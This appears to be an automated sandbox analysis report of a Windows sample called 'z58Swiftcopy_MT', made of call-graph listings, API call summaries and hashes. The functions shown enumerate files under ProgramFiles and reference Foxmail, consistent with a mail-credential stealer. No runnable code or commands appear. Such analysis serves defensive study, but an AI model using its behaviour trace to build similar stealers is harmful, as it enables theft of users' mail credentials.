20 API calls 6511->6512 6514 33a78c01 6512->6514 6515 33a762ac 26 API calls 6514->6515 6516 33a78c0b 6515->6516 6516->6500 6517 33a78c4b 6543 33a78c72 6517->6543 6519 33a78c1f 6519->6517 6536 33a78b34 6519->6536 6522 33a77286 6521->6522 6523 33a77318 6521->6523 6522->6523 6524 33a78be3 27 API calls 6522->6524 6527 33a7731f 6523->6527 6525 33a772af 6524->6525 6525->6523 6526 33a772dd GetFileType 6525->6526 6526->6525 6528 33a77326 6527->6528 6529 33a77369 GetStdHandle 6528->6529 6530 33a773d1 6528->6530 6531 33a7737c GetFileType 6528->6531 6529->6528 6530->6506 6531->6528 6554 33a756b9 RtlLeaveCriticalSection 6532->6554 6534 33a77429 6534->6504 6535->6519 6537 33a7637b 20 API calls 6536->6537 6538 33a78b46 6537->6538 6542 33a78b53 6538->6542 6546 33a75eb7 6538->6546 6539 33a7571e 20 API calls 6540 33a78ba5 6539->6540 6540->6519 6542->6539 6553 33a756b9 RtlLeaveCriticalSection 6543->6553 6545 33a78c79 6545->6516 6547 33a75c45 5 API calls 6546->6547 6548 33a75ede 6547->6548 6549 33a75efc InitializeCriticalSectionAndSpinCount 6548->6549 6550 33a75ee7 6548->6550 6549->6550 6551 33a72ada 5 API calls 6550->6551 6552 33a75f13 6551->6552 6552->6538 6553->6545 6554->6534 7430 33a75351 7431 33a75360 7430->7431 7432 33a75374 7430->7432 7431->7432 7435 33a7571e 20 API calls 7431->7435 7433 33a7571e 20 API calls 7432->7433 7434 33a75386 7433->7434 7436 33a7571e 20 API calls 7434->7436 7435->7432 7437 33a75399 7436->7437 7438 33a7571e 20 API calls 7437->7438 7439 33a753aa 7438->7439 7440 33a7571e 20 API calls 7439->7440 7441 33a753bb 7440->7441 7478 33a73c90 RtlUnwind 7531 33a736d0 7532 33a736e2 7531->7532 7534 33a736f0 7531->7534 7533 33a72ada 5 API calls 7532->7533 7533->7534 6555 33a74bdd 6556 33a74bec 6555->6556 6557 33a74c08 6555->6557 6556->6557 6558 33a74bf2 6556->6558 6578 33a76d60 6557->6578 6560 33a76368 20 API calls 6558->6560 6562 33a74bf7 6560->6562 6564 33a762ac 26 API calls 6562->6564 6563 33a74c33 6582 33a74d01 6563->6582 6565 33a74c01 6564->6565 6568 33a74e76 20 API calls 6569 33a74c5d 6568->6569 6570 33a74c66 6569->6570 6571 33a74c72 6569->6571 6572 33a76368 20 API calls 6570->6572 6573 33a74d01 38 API calls 6571->6573 6577 33a74c6b 6572->6577 6575 33a74c88 6573->6575 6574 33a7571e 20 API calls 6574->6565 6576 33a7571e 20 API calls 6575->6576 6575->6577 6576->6577 6577->6574 6579 33a74c0f GetModuleFileNameA 6578->6579 6580 33a76d69 6578->6580 6579->6563 6588 33a76c5f 6580->6588 6584 33a74d26 6582->6584 6586 33a74d86 6584->6586 6953 33a770eb 6584->6953 6585 33a74c50 6585->6568 6586->6585 6587 33a770eb 38 API calls 6586->6587 6587->6586 6608 33a75af6 GetLastError 6588->6608 6590 33a76c6c 6628 33a76d7e 6590->6628 6592 33a76c74 6637 33a769f3 6592->6637 6595 33a76c8b 6595->6579 6596 33a756d0 21 API calls 6597 33a76c9c 6596->6597 6603 33a76cce 6597->6603 6644 33a76e20 6597->6644 6600 33a7571e 20 API calls 6600->6595 6601 33a76cc9 6602 33a76368 20 API calls 6601->6602 6602->6603 6603->6600 6604 33a76ce6 6605 33a76d12 6604->6605 6606 33a7571e 20 API calls 6604->6606 6605->6603 6654 33a768c9 6605->6654 6606->6605 6609 33a75b0c 6608->6609 6610 33a75b12 6608->6610 6611 33a75e08 11 API calls 6609->6611 6612 33a7637b 20 API calls 6610->6612 6614 33a75b61 SetLastError 6610->6614 6611->6610 6613 33a75b24 6612->6613 6615 33a75e5e 11 API calls 6613->6615 6619 33a75b2c 6613->6619 6614->6590 6616 33a75b41 6615->6616 6616->6619 6620 33a75b48 6616->6620 6617 33a7571e 20 API calls 6618 33a75b32 6617->6618 6621 33a75b6d SetLastError 6618->6621 6619->6617 6622 33a7593c 20 API calls 6620->6622 6657 33a755a8 6621->6657 6623 33a75b53 6622->6623 6625 33a7571e 20 API calls 6623->6625 6627 33a75b5a 6625->6627 6627->6614 6627->6621 6629 33a76d8a 6628->6629 6630 33a75af6 38 API calls 6629->6630 6635 33a76d94 6630->6635 6632 33a76e18 6632->6592 6634 33a755a8 38 API calls 6634->6635 6635->6632 6635->6634 6636 33a7571e 20 API calls 6635->6636 6806 33a75671 RtlEnterCriticalSection 6635->6806 6807 33a76e0f 6635->6807 6636->6635 6811 33a754a7 6637->6811 6640 33a76a26 6642 33a76a2b GetACP 6640->6642 6643 33a76a3d 6640->6643 6641 33a76a14 GetOEMCP 6641->6643 6642->6643 6643->6595 6643->6596 6645 33a769f3 40 API calls 6644->6645 6646 33a76e3f 6645->6646 6649 33a76e90 IsValidCodePage 6646->6649 6651 33a76e46 6646->6651 6653 33a76eb5 6646->6653 6647 33a72ada 5 API calls 6648 33a76cc1 6647->6648 6648->6601 6648->6604 6650 33a76ea2 GetCPInfo 6649->6650 6649->6651 6650->6651 6650->6653 6651->6647 6844 33a76acb GetCPInfo 6653->6844 6917 33a76886 6654->6917 6656 33a768ed 6656->6603 6668 33a77613 6657->6668 6660 33a755b8 6662 33a755c2 IsProcessorFeaturePresent 6660->6662 6667 33a755e0 6660->6667 6663 33a755cd 6662->6663 6665 33a760e2 8 API calls 6663->6665 6665->6667 6698 33a74bc1 6667->6698 6701 33a77581 6668->6701 6671 33a7766e 6672 33a7767a 6671->6672 6673 33a75b7a 20 API calls 6672->6673 6677 33a776a7 6672->6677 6680 33a776a1 6672->6680 6673->6680 6674 33a776f3 6676 33a76368 20 API calls 6674->6676 6675 33a776d6 6724 33a7bdc9 6675->6724 6678 33a776f8 6676->6678 6684 33a7771f 6677->6684 6715 33a75671 RtlEnterCriticalSection 6677->6715 6681 33a762ac 26 API calls 6678->6681 6680->6674 6680->6675 6680->6677 6681->6675 6686 33a7777e 6684->6686 6688 33a77776 6684->6688 6696 33a777a9 6684->6696 6716 33a756b9 RtlLeaveCriticalSection 6684->6716 6686->6696 6717 33a77665 6686->6717 6689 33a74bc1 28 API calls 6688->6689 6689->6686 6691 33a7780c 6691->6675 6697 33a75af6 38 API calls 6691->6697 6693 33a75af6 38 API calls 6693->6691 6695 33a77665 38 API calls 6695->6696 6720 33a7782e 6696->6720 6697->6675 6728 33a7499b 6698->6728 6704 33a77527 6701->6704 6703 33a755ad 6703->6660 6703->6671 6705 33a77533 6704->6705 6710 33a75671 RtlEnterCriticalSection 6705->6710 6707 33a77541 6711 33a77575 6707->6711 6709 33a77568 6709->6703 6710->6707 6714 33a756b9 RtlLeaveCriticalSection 6711->6714 6713 33a7757f 6713->6709 6714->6713 6715->6684 6716->6688 6718 33a75af6 38 API calls 6717->6718 6719 33a7766a 6718->6719 6719->6695 6721 33a77834 6720->6721 6722 33a777fd 6720->6722 6727 33a756b9 RtlLeaveCriticalSection 6721->6727 6722->6675 6722->6691 6722->6693 6725 33a72ada 5 API calls 6724->6725 6726 33a7bdd4 6725->6726 6726->6726 6727->6722 6729 33a749a7 6728->6729 6730 33a749bf 6729->6730 6750 33a74af5 GetModuleHandleW 6729->6750 6759 33a75671 RtlEnterCriticalSection 6730->6759 6734 33a74a65 6767 33a74aa5 6734->6767 6737 33a749c7 6737->6734 6739 33a74a3c 6737->6739 6760 33a7527a 6737->6760 6740 33a74a54 6739->6740 6763 33a74669 6739->6763 6745 33a74669 5 API calls 6740->6745 6741 33a74a82 6770 33a74ab4 6741->6770 6742 33a74aae 6743 33a7bdc9 5 API calls 6742->6743 6748 33a74ab3 6743->6748 6745->6734 6751 33a749b3 6750->6751 6751->6730 6752 33a74b39 GetModuleHandleExW 6751->6752 6753 33a74b63 GetProcAddress 6752->6753 6754 33a74b78 6752->6754 6753->6754 6755 33a74b95 6754->6755 6756 33a74b8c FreeLibrary 6754->6756 6757 33a72ada 5 API calls 6755->6757 6756->6755 6758 33a74b9f 6757->6758 6758->6730 6759->6737 6778 33a75132 6760->6778 6765 33a74698 6763->6765 6764 33a72ada 5 API calls 6766 33a746c1 6764->6766 6765->6764 6766->6740 6799 33a756b9 RtlLeaveCriticalSection 6767->6799 6769 33a74a7e 6769->6741 6769->6742 6800 33a76025 6770->6800 6773 33a74ae2 6776 33a74b39 8 API calls 6773->6776 6774 33a74ac2 GetPEB 6774->6773 6775 33a74ad2 GetCurrentProcess TerminateProcess 6774->6775 6775->6773 6777 33a74aea ExitProcess 6776->6777 6781 33a750e1 6778->6781 6780 33a75156 6780->6739 6782 33a750ed 6781->6782 6789 33a75671 RtlEnterCriticalSection 6782->6789 6784 33a750fb 6790 33a7515a 6784->6790 6788 33a75119 6788->6780 6789->6784 6793 33a7517a 6790->6793 6794 33a75182 6790->6794 6791 33a72ada IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6792 33a75108 6791->6792 6796 33a75126 6792->6796 6793->6791 6794->6793 6795 33a7571e 20 API calls 6794->6795 6795->6793 6797 33a756b9 RtlLeaveCriticalSection 6796->6797 6798 33a75130 6797->6798 6798->6788 6799->6769 6801 33a76040 6800->6801 6802 33a7604a 6800->6802 6804 33a72ada 5 API calls 6801->6804 6803 33a75c45 5 API calls 6802->6803 6803->6801 6805 33a74abe 6804->6805 6805->6773 6805->6774 6806->6635 6810 33a756b9 RtlLeaveCriticalSection 6807->6810 6809 33a76e16 6809->6635 6810->6809 6812 33a754c4 6811->6812 6818 33a754ba 6811->6818 6813 33a75af6 38 API calls 6812->6813 6812->6818 6814 33a754e5 6813->6814 6819 33a77a00 6814->6819 6818->6640 6818->6641 6820 33a77a13 6819->6820 6821 33a754fe 6819->6821 6820->6821 6827 33a77f0f 6820->6827 6823 33a77a2d 6821->6823 6824 33a77a55 6823->6824 6825 33a77a40 6823->6825 6824->6818 6825->6824 6826 33a76d7e 38 API calls 6825->6826 6826->6824 6828 33a77f1b 6827->6828 6829 33a75af6 38 API calls 6828->6829 6830 33a77f24 6829->6830 6833 33a77f72 6830->6833 6839 33a75671 RtlEnterCriticalSection 6830->6839 6832 33a77f42 6834 33a77f86 20 API calls 6832->6834 6833->6821 6835 33a77f56 6834->6835 6840 33a77f75 6835->6840 6838 33a755a8 38 API calls 6838->6833 6839->6832 6843 33a756b9 RtlLeaveCriticalSection 6840->6843 6842 33a77f69 6842->6833 6842->6838 6843->6842 6848 33a76b05 6844->6848 6853 33a76baf 6844->6853 6847 33a72ada 5 API calls 6850 33a76c5b 6847->6850 6854 33a786e4 6848->6854 6850->6651 6852 33a78a3e 43 API calls 6852->6853 6853->6847 6855 33a754a7 38 API calls 6854->6855 6856 33a78704 MultiByteToWideChar 6855->6856 6858 33a78742 6856->6858 6865 33a787da 6856->6865 6860 33a756d0 21 API calls 6858->6860 6864 33a78763 6858->6864 6859 33a72ada 5 API calls 6861 33a76b66 6859->6861 6860->6864 6868 33a78a3e 6861->6868 6862 33a787d4 6873 33a78801 6862->6873 6864->6862 6866 33a787a8 MultiByteToWideChar 6864->6866 6865->6859 6866->6862 6867 33a787c4 GetStringTypeW 6866->6867 6867->6862 6869 33a754a7 38 API calls 6868->6869 6870 33a78a51 6869->6870 6877 33a78821 6870->6877 6874 33a7881e 6873->6874 6875 33a7880d 6873->6875 6874->6865 6875->6874 6876 33a7571e 20 API calls 6875->6876 6876->6874 6878 33a7883c 6877->6878 6879 33a78862 MultiByteToWideChar 6878->6879 6880 33a7888c 6879->6880 6881 33a78a16 6879->6881 6884 33a756d0 21 API calls 6880->6884 6887 33a788ad 6880->6887 6882 33a72ada 5 API calls 6881->6882 6883 33a76b87 6882->6883 6883->6852 6884->6887 6885 33a788f6 MultiByteToWideChar 6886 33a78962 6885->6886 6888 33a7890f 6885->6888 6890 33a78801 20 API calls 6886->6890 6887->6885 6887->6886 6904 33a75f19 6888->6904 6890->6881 6892 33a78971 6894 33a756d0 21 API calls 6892->6894 6897 33a78992 6892->6897 6893 33a78939 6893->6886 6895 33a75f19 11 API calls 6893->6895 6894->6897 6895->6886 6896 33a78a07 6899 33a78801 20 API calls 6896->6899 6897->6896 6898 33a75f19 11 API calls 6897->6898 6900 33a789e6 6898->6900 6899->6886 6900->6896 6901 33a789f5 WideCharToMultiByte 6900->6901 6901->6896 6902 33a78a35 6901->6902 6903 33a78801 20 API calls 6902->6903 6903->6886 6905 33a75c45 5 API calls 6904->6905 6906 33a75f40 6905->6906 6909 33a75f49 6906->6909 6912 33a75fa1 6906->6912 6910 33a72ada 5 API calls 6909->6910 6911 33a75f9b 6910->6911 6911->6886 6911->6892 6911->6893 6913 33a75c45 5 API calls 6912->6913 6914 33a75fc8 6913->6914 6915 33a72ada 5 API calls 6914->6915 6916 33a75f89 LCMapStringW 6915->6916 6916->6909 6918 33a76892 6917->6918 6925 33a75671 RtlEnterCriticalSection 6918->6925 6920 33a7689c 6926 33a768f1 6920->6926 6924 33a768b5 6924->6656 6925->6920 6938 33a77011 6926->6938 6928 33a7693f 6929 33a77011 26 API calls 6928->6929 6930 33a7695b 6929->6930 6931 33a77011 26 API calls 6930->6931 6932 33a76979 6931->6932 6933 33a768a9 6932->6933 6934 33a7571e 20 API calls 6932->6934 6935 33a768bd 6933->6935 6934->6933 6952 33a756b9 RtlLeaveCriticalSection 6935->6952 6937 33a768c7 6937->6924 6939 33a77022 6938->6939 6948 33a7701e 6938->6948 6940 33a77029 6939->6940 6943 33a7703c 6939->6943 6941 33a76368 20 API calls 6940->6941 6942 33a7702e 6941->6942 6944 33a762ac 26 API calls 6942->6944 6945 33a77073 6943->6945 6946 33a7706a 6943->6946 6943->6948 6944->6948 6945->6948 6950 33a76368 20 API calls 6945->6950 6947 33a76368 20 API calls 6946->6947 6949 33a7706f 6947->6949 6948->6928 6951 33a762ac 26 API calls 6949->6951 6950->6949 6951->6948 6952->6937 6956 33a77092 6953->6956 6957 33a754a7 38 API calls 6956->6957 6958 33a770a6 6957->6958 6958->6584 7862 33a7281c 7865 33a72882 7862->7865 7868 33a73550 7865->7868 7867 33a7282a 7869 33a7355d 7868->7869 7872 33a7358a 7868->7872 7870 33a747e5 21 API calls 7869->7870 7869->7872 7871 33a7357a 7870->7871 7871->7872 7873 33a7544d 26 API calls 7871->7873 7872->7867 7873->7872 5909 33a71c5b 5910 33a71c6b 5909->5910 5913 33a712ee 5910->5913 5912 33a71c87 5914 33a71324 5913->5914 5915 33a713b7 GetEnvironmentVariableW 5914->5915 5939 33a710f1 5915->5939 5918 33a710f1 57 API calls 5919 33a71465 5918->5919 5920 33a710f1 57 API calls 5919->5920 5921 33a71479 5920->5921 5922 33a710f1 57 API calls 5921->5922 5923 33a7148d 5922->5923 5924 33a710f1 57 API calls 5923->5924 5925 33a714a1 5924->5925 5926 33a710f1 57 API calls 5925->5926 5927 33a714b5 lstrlenW 5926->5927 5928 33a714d2 5927->5928 5929 33a714d9 lstrlenW 5927->5929 5928->5912 5930 33a710f1 57 API calls 5929->5930 5931 33a71501 lstrlenW lstrcatW 5930->5931 5932 33a710f1 57 API calls 5931->5932 5933 33a71539 lstrlenW lstrcatW 5932->5933 5934 33a710f1 57 API calls 5933->5934 5935 33a7156b lstrlenW lstrcatW 5934->5935 5936 33a710f1 57 API calls 5935->5936 5937 33a7159d lstrlenW lstrcatW 5936->5937 5938 33a710f1 57 API calls 5937->5938 5938->5928 5940 33a71118 5939->5940 5941 33a71129 lstrlenW 5940->5941 5952 33a72c40 5941->5952 5944 33a71177 lstrlenW FindFirstFileW 5946 33a711e1 5944->5946 5947 33a711a0 5944->5947 5945 33a71168 lstrlenW 5945->5944 5946->5918 5948 33a711c7 FindNextFileW 5947->5948 5949 33a711aa 5947->5949 5948->5947 5951 33a711da FindClose 5948->5951 5949->5948 5954 33a71000 5949->5954 5951->5946 5953 33a71148 lstrcatW lstrlenW 5952->5953 5953->5944 5953->5945 5955 33a71022 5954->5955 5956 33a710af 5955->5956 5957 33a7102f lstrcatW lstrlenW 5955->5957 5958 33a710b5 lstrlenW 5956->5958 5969 33a710ad 5956->5969 5959 33a7106b lstrlenW 5957->5959 5960 33a7105a lstrlenW 5957->5960 5985 33a71e16 5958->5985 5971 33a71e89 lstrlenW 5959->5971 5960->5959 5963 33a710ca 5966 33a71e89 5 API calls 5963->5966 5963->5969 5964 33a71088 GetFileAttributesW 5965 33a7109c 5964->5965 5964->5969 5965->5969 5977 33a7173a 5965->5977 5968 33a710df 5966->5968 5990 33a711ea 5968->5990 5969->5949 5972 33a72c40 5971->5972 5973 33a71ea7 lstrcatW lstrlenW 5972->5973 5974 33a71ec2 5973->5974 5975 33a71ed1 lstrcatW 5973->5975 5974->5975 5976 33a71ec7 lstrlenW 5974->5976 5975->5964 5976->5975 5978 33a71747 5977->5978 6005 33a71cca 5978->6005 5981 33a7199f 5981->5969 5983 33a71824 5983->5981 6025 33a715da 5983->6025 5986 33a71e29 5985->5986 5989 33a71e4c 5985->5989 5987 33a71e2d lstrlenW 5986->5987 5986->5989 5988 33a71e3f lstrlenW 5987->5988 5987->5989 5988->5989 5989->5963 5991 33a7120e 5990->5991 5992 33a71e89 5 API calls 5991->5992 5993 33a71220 GetFileAttributesW 5992->5993 5994 33a71246 5993->5994 5995 33a71235 5993->5995 5996 33a71e89 5 API calls 5994->5996 5995->5994 5997 33a7173a 35 API calls 5995->5997 5998 33a71258 5996->5998 5997->5994 5999 33a710f1 56 API calls 5998->5999 6000 33a7126d 5999->6000 6001 33a71e89 5 API calls 6000->6001 6002 33a7127f 6001->6002 6003 33a710f1 56 API calls 6002->6003 6004 33a712e6 6003->6004 6004->5969 6006 33a71cf1 6005->6006 6007 33a71d0f CopyFileW CreateFileW 6006->6007 6008 33a71d55 GetFileSize 6007->6008 6009 33a71d44 DeleteFileW 6007->6009 6010 33a71ede 22 API calls 6008->6010 6014 33a71808 6009->6014 6011 33a71d66 ReadFile 6010->6011 6012 33a71d94 CloseHandle DeleteFileW 6011->6012 6013 33a71d7d CloseHandle DeleteFileW 6011->6013 6012->6014 6013->6014 6014->5981 6015 33a71ede 6014->6015 6017 33a7222f 6015->6017 6018 33a7224e 6017->6018 6020 33a72250 6017->6020 6033 33a7474f 6017->6033 6038 33a747e5 6017->6038 6018->5983 6021 33a72908 6020->6021 6045 33a735d2 6020->6045 6022 33a735d2 RaiseException 6021->6022 6024 33a72925 6022->6024 6024->5983 6026 33a7160c 6025->6026 6027 33a7163c lstrlenW 6026->6027 6133 33a71c9d 6027->6133 6029 33a71655 lstrcatW lstrlenW 6030 33a71678 6029->6030 6031 33a71693 6030->6031 6032 33a7167e lstrcatW 6030->6032 6031->5983 6032->6031 6048 33a74793 6033->6048 6036 33a7478f 6036->6017 6037 33a74765 6054 33a72ada 6037->6054 6043 33a756d0 6038->6043 6039 33a7570e 6067 33a76368 6039->6067 6040 33a756f9 RtlAllocateHeap 6042 33a7570c 6040->6042 6040->6043 6042->6017 6043->6039 6043->6040 6044 33a7474f 7 API calls 6043->6044 6044->6043 6047 33a735f2 RaiseException 6045->6047 6047->6021 6049 33a7479f 6048->6049 6061 33a75671 RtlEnterCriticalSection 6049->6061 6051 33a747aa 6062 33a747dc 6051->6062 6053 33a747d1 6053->6037 6055 33a72ae5 IsProcessorFeaturePresent 6054->6055 6056 33a72ae3 6054->6056 6058 33a72b58 6055->6058 6056->6036 6066 33a72b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6058->6066 6060 33a72c3b 6060->6036 6061->6051 6065 33a756b9 RtlLeaveCriticalSection 6062->6065 6064 33a747e3 6064->6053 6065->6064 6066->6060 6070 33a75b7a GetLastError 6067->6070 6071 33a75b93 6070->6071 6072 33a75b99 6070->6072 6089 33a75e08 6071->6089 6076 33a75bf0 SetLastError 6072->6076 6096 33a7637b 6072->6096 6079 33a75bf9 6076->6079 6077 33a75bb3 6103 33a7571e 6077->6103 6079->6042 6082 33a75bcf 6116 33a7593c 6082->6116 6083 33a75bb9 6084 33a75be7 SetLastError 6083->6084 6084->6079 6087 33a7571e 17 API calls 6088 33a75be0 6087->6088 6088->6076 6088->6084 6121 33a75c45 6089->6121 6091 33a75e2f 6092 33a75e47 TlsGetValue 6091->6092 6093 33a75e3b 6091->6093 6092->6093 6094 33a72ada 5 API calls 6093->6094 6095 33a75e58 6094->6095 6095->6072 6101 33a76388 6096->6101 6097 33a763c8 6100 33a76368 19 API calls 6097->6100 6098 33a763b3 RtlAllocateHeap 6099 33a75bab 6098->6099 6098->6101 6099->6077 6109 33a75e5e 6099->6109 6100->6099 6101->6097 6101->6098 6102 33a7474f 7 API calls 6101->6102 6102->6101 6104 33a75752 6103->6104 6105 33a75729 HeapFree 6103->6105 6104->6083 6105->6104 6106 33a7573e 6105->6106 6107 33a76368 18 API calls 6106->6107 6108 33a75744 GetLastError 6107->6108 6108->6104 6110 33a75c45 5 API calls 6109->6110 6111 33a75e85 6110->6111 6112 33a75ea0 TlsSetValue 6111->6112 6113 33a75e94 6111->6113 6112->6113 6114 33a72ada 5 API calls 6113->6114 6115 33a75bc8 6114->6115 6115->6077 6115->6082 6127 33a75914 6116->6127 6125 33a75c75 6121->6125 6126 33a75c71 6121->6126 6122 33a75c95 6124 33a75ca1 GetProcAddress 6122->6124 6122->6125 6123 33a75ce1 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 6123->6126 6124->6125 6125->6091 6126->6122 6126->6123 6126->6125 6128 33a75854 RtlEnterCriticalSection RtlLeaveCriticalSection 6127->6128 6129 33a75938 6128->6129 6130 33a758c4 6129->6130 6131 33a75758 20 API calls 6130->6131 6132 33a758e8 6131->6132 6132->6087 6134 33a71ca6 6133->6134 6134->6029 7479 33a74a9a 7480 33a75411 38 API calls 7479->7480 7481 33a74aa2 7480->7481

                                                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                                                      Function 33A710F1 Relevance: 12.1, APIs: 8, Instructions: 88stringfileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 33A71137
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 33A71151
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 33A7115C
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 33A7116D
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 33A7117C
                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 33A71193
                                                                                                                                                                                                                                      • FindNextFileW.KERNELBASE(00000000,00000010), ref: 33A711D0
                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 33A711DB
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.32067210118.0000000033A71000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067186886.0000000033A70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067210118.0000000033A86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_33a70000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1083526818-0
                                                                                                                                                                                                                                      • Opcode ID: fcb0e12b1f5841b3526bbf1b0f49a29c0375735733d8ba495bcc66e1c1dd1be0
                                                                                                                                                                                                                                      • Instruction ID: 5f3a66660f6f723d429595a9d74ac8b79175051612e1a1b8b5c3f0c742a0146e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fcb0e12b1f5841b3526bbf1b0f49a29c0375735733d8ba495bcc66e1c1dd1be0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A52182729043486BD720EAA4DC8CF9B7BDCEF84314F04092EF959D7190EB71D64A8796
                                                                                                                                                                                                                                      Function 33A712EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 243stringCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 33A71434
                                                                                                                                                                                                                                        • Part of subcall function 33A710F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 33A71137
                                                                                                                                                                                                                                        • Part of subcall function 33A710F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 33A71151
                                                                                                                                                                                                                                        • Part of subcall function 33A710F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 33A7115C
                                                                                                                                                                                                                                        • Part of subcall function 33A710F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 33A7116D
                                                                                                                                                                                                                                        • Part of subcall function 33A710F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 33A7117C
                                                                                                                                                                                                                                        • Part of subcall function 33A710F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 33A71193
                                                                                                                                                                                                                                        • Part of subcall function 33A710F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 33A711D0
                                                                                                                                                                                                                                        • Part of subcall function 33A710F1: FindClose.KERNEL32(00000000), ref: 33A711DB
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 33A714C5
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 33A714E0
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?), ref: 33A7150F
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(00000000), ref: 33A71521
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?), ref: 33A71547
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(00000000), ref: 33A71553
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?), ref: 33A71579
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(00000000), ref: 33A71585
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?), ref: 33A715AB
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(00000000), ref: 33A715B7
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.32067210118.0000000033A71000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067186886.0000000033A70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067210118.0000000033A86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_33a70000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                                                                                                                                                      • String ID: )$Foxmail$ProgramFiles
                                                                                                                                                                                                                                      • API String ID: 672098462-2938083778
                                                                                                                                                                                                                                      • Opcode ID: a8c26893c9c38729d46187e1c2b354af837357900b939720e4d1e68508f0dd15
                                                                                                                                                                                                                                      • Instruction ID: 7f994265d5233302954c0d0d03883c4320bf3184b62f93a20de88950550ad5bf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a8c26893c9c38729d46187e1c2b354af837357900b939720e4d1e68508f0dd15
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EE81B171A00358A9DB20DBA5DC85FEE7779EF84700F00159BF908EB290EAB15A85CF95

                                                                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                                                                      Function 33A72639 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 33A72645
                                                                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,00000017), ref: 33A72710
                                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,00000017), ref: 33A72730
                                                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,00000017), ref: 33A7273A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.32067210118.0000000033A71000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067186886.0000000033A70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067210118.0000000033A86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_33a70000_z58Swiftcopy_MT.jbxd
